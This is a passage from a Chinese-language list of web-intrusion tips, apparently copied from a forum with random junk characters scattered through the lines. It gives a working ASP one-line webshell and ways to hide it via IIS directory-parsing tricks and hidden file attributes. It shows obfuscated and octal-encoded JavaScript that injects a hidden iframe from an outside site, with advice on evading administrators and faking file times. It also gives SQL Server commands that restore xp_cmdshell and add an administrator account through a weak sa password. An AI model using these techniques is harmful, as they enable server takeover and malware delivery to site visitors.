( n8 V* @8 D, J3 \( R* |拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* P; @5 y& u$ t. p/ x
通过web访问ASP木马:http://ip/images../news.asp?action=login
* `5 K% v Q. N n* S+ c. t4 T如何删除非标准目录:rmdir images..\ /s8 [: \2 x, ^, s8 o2 _
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
: k$ |* b- Q( amkdir programme.asp
4 R1 r, d6 Z) Y; I1 o新建1.txt文件内容:<!--#include file=”12.jpg”-->
0 q$ l7 q) ]( E0 Q% |" F新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件9 m$ j1 u7 u$ Z4 U1 S
attrib +H +S programme.asp6 P4 T# \( [* U' k, K9 Q
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt" }0 V5 h% K8 q4 C9 b
- i# Y5 p7 q" ]7 w
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。& e2 ?+ c% i- L a
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
3 O$ C& q3 r4 w* @1 e( j) P, \! q8 A
55、JS隐蔽挂马
% C' I4 R1 X1 A! h4 z$ ]7 S1./ R+ P! ~8 u' \9 ?( a; q
var tr4c3="<iframe src=ht";
0 x& d6 t* N4 j! R3 n; n& M# \tr4c3 = tr4c3+"tp:/"; f! q; `0 y' V) r: j) x- T
tr4c3 = tr4c3+"/ww";- r2 M4 g/ z; n# N6 G6 {2 T" m2 \
tr4c3 = tr4c3+"w.tr4";8 D! L6 w+ t. m) J& Z& } d
tr4c3 = tr4c3+"c3.com/inc/m";
( M: H" a1 y2 M- N% w) d- jtr4c3 = tr4c3+"m.htm style="display:none"></i";
/ `: F [& g3 q( Ktr4c3 =tr4c3+"frame>'";
$ n( G. t' k7 w0 K) A, Xdocument.write(tr4c3);
6 A* ]8 Q# J2 z* H6 ?+ Q( w8 P1 ^避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。3 M4 Z; x$ p; B8 l* Q) ~2 D- f( ?
! d8 O3 m6 z/ p/ J' n: ~2.
, V0 @( n! u; X& i# R转换进制,然后用EVAL执行。如0 O# G1 k1 E$ s* |( U+ U, j1 C
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
; z+ w; h$ ^* i! n. l! _5 @2 }6 f不过这个有点显眼。# d/ P, g1 z% J1 [* ~' {$ I
3.( O8 ~: ?$ U3 e* F& @6 s
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
0 g2 v; O+ r/ q: ^0 x$ j最后一点,别忘了把文件的时间也修改下。7 [& z! ~( G; u, d: I2 |
+ k0 r! Y1 J6 Y# b) i! [56.3389终端入侵常用DOS命令 L2 K, ~1 C8 o5 `. y& O2 Z( H# v
taskkill taskkill /PID 1248 /t
, V+ Q1 o/ x, v/ U6 ?9 O7 v+ M
! E# J7 ?: T- V, l1 ?tasklist 查进程
# Y/ e4 ?: @/ W; P6 Z) L$ l, S/ O- I; X' U% n
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
% [% x* _! i7 @iisreset /reboot
4 A) l. N0 M( e' btsshutdn /reboot /delay:1 重起服务器& `+ ^# i8 {$ i1 [' l6 l* r% {
' v$ d4 R/ `. N; \3 V+ f
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 C% d& G. Q2 h/ G3 k( W% g6 W
p* h8 W% p- N8 ^; j2 Gquery user 查看当前终端用户在线情况
D: G8 Q b ?* R
7 X3 z( }+ j* H0 H& z; Y0 q要显示有关所有会话使用的进程的信息,请键入:query process *
* V3 @, M1 D! F* y% a! C
9 c4 f( I6 i: k8 k h7 U要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
5 C! E$ N# U0 S7 g$ A& S3 m
. ?( F6 C+ m+ c要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2" F1 V3 v6 Z: m- n# u
& a: R/ ~8 O9 z5 ?5 x1 ]/ n
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM028 l/ `1 u9 K1 q. b# L
8 g7 E, f, d0 C命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
# D" g3 n1 l8 L% w/ o, _
/ y! C8 O6 R7 E$ N2 [/ K命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统8 t+ Y! s T7 U- l+ y! T5 s
8 A" y8 i/ N9 i g6 k# p4 A命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。( B8 p/ f$ L7 ?+ w: \4 \4 V* U
: o4 v( R0 P& g# ?命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机4 l' j2 n- y2 G* L: s; H$ p$ T
, Y5 M7 F) E7 P; ^; S. O
56、在地址栏或按Ctrl+O,输入:! a# O% W( q( \2 I, ^2 X1 b# s5 @
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;% e+ I! f$ f3 {8 P
3 N% a) Y$ U# e/ a7 v* l7 j
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。' f, m1 r A- @4 A+ B
% q+ |: f" {: I5 X. a57、net user的时候,是不能显示加$的用户,但是如果不处理的话,8 Q& @* H2 g- r& n* S K
用net localgroup administrators是可以看到管理组下,加了$的用户的。
: c; L7 X+ U6 [: ?; q4 ~1 J; _7 ] A8 [! s0 w! p* A+ S3 g2 e
58、 sa弱口令相关命令
1 x, ~" X: e. D( J" @, T& V% s
g% j/ U& I; n5 ]( D) C一.更改sa口令方法:# P! J) b3 Y. v0 Z! `% h
用sql综合利用工具连接后,执行命令:
+ R7 a4 y v: M) h2 L1 m: Vexec sp_password NULL,'20001001','sa'- w5 P( \, b+ D
(提示:慎用!)4 b a% U5 I1 i3 q* m
: w: m# h9 D# e g x: \! C二.简单修补sa弱口令.
N- t2 V$ X8 T1 h$ }' t6 s4 n; x9 v. g) O) S
方法1:查询分离器连接后执行:# a% o5 C* `( A( N
if exists (select * from
" ~) S; L4 E5 |dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
# u/ q0 Y0 @9 E2 q* T; |0 `- _OBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 p+ k7 P& F/ |) D/ l7 O/ H
0 k7 y6 S4 e1 P+ g, Q
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'# |* D0 E: {/ `) H) `# i# H! F2 Y
( k' t5 z# l; D3 K
GO5 w9 N' C( c9 p! ~) s
* M# s" m9 S* W! l4 g: x6 N
然后按F5键命令执行完毕5 ]; E5 |8 t7 H& A; l$ [" \2 r
* S% J) ^; L) g8 k方法2:查询分离器连接后# H [- m4 T1 E7 \* g
第一步执行:use master
+ ?0 {/ @) e1 g! |- V( G第二步执行:sp_dropextendedproc 'xp_cmdshell'- ^3 |8 W5 Y& H
然后按F5键命令执行完毕
, [# l6 x1 Y2 {% M0 B- b ~
3 G6 E; m5 ?5 ^/ u# m5 q( w& b4 H' w5 b6 r1 Y
三.常见情况恢复执行xp_cmdshell.
' {8 v/ A0 d( {, G7 |5 b, ~
6 C2 |! n. T$ o2 e
! P5 t$ _8 x+ \! L6 M1 未能找到存储过程'master..xpcmdshell'.* e: w: E: I/ z; W j# m" a/ {- x6 m
恢复方法:查询分离器连接后,+ E; }; A0 ] x h9 X! q! K
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
3 R- I/ u6 v6 s. p第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4 d. E2 w3 y. j* r然后按F5键命令执行完毕6 w5 v. \6 a7 E, P; V- p$ l
1 \; f6 c$ g" j. I" a1 \. F
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
6 G" l( z( \/ n, d/ U; \" D恢复方法:查询分离器连接后,9 T7 a( b% r9 `
第一步执行:sp_dropextendedproc "xp_cmdshell"! U. N+ B! A0 A1 c& B- a* X1 ?
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
% G5 P6 P+ K7 F8 q. f# A% K然后按F5键命令执行完毕
6 |& Q) Y0 t" p0 a6 {3 y# a' o/ H5 z5 P
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
( B8 [ {+ Y# Z4 S/ V. q恢复方法:查询分离器连接后,
% D/ b- ~5 s! a0 a, T% S第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
?( n0 x5 G8 B第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
4 y/ C9 L4 b( b. r然后按F5键命令执行完毕4 j" x( s: n' s. Q" i- _
+ Y- \( ]5 Z+ n; n6 z
四.终极方法.9 X" H: b) Z5 r; A: v: e
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: X4 M+ U5 @6 i# [9 x8 i
查询分离器连接后,4 C* \* S& ^$ G9 t
2000servser系统:) R: _' I2 o0 p) D2 Z* s. H4 J: O# @+ c' a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'6 p, r" r! l8 d e3 p8 X
' `0 Z l' n7 u# n3 Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add', l5 X, ]* c0 ^8 b
* T& o6 n0 Y! p* Y+ j
xp或2003server系统:+ M- f/ t! c2 G" M+ b
1 m% D- T- b S V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'1 K- f. N, ]2 z: ^+ j4 Q
! R" U/ b+ T) X( A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
1 Y9 W3 k, V* h8 C M8 Y |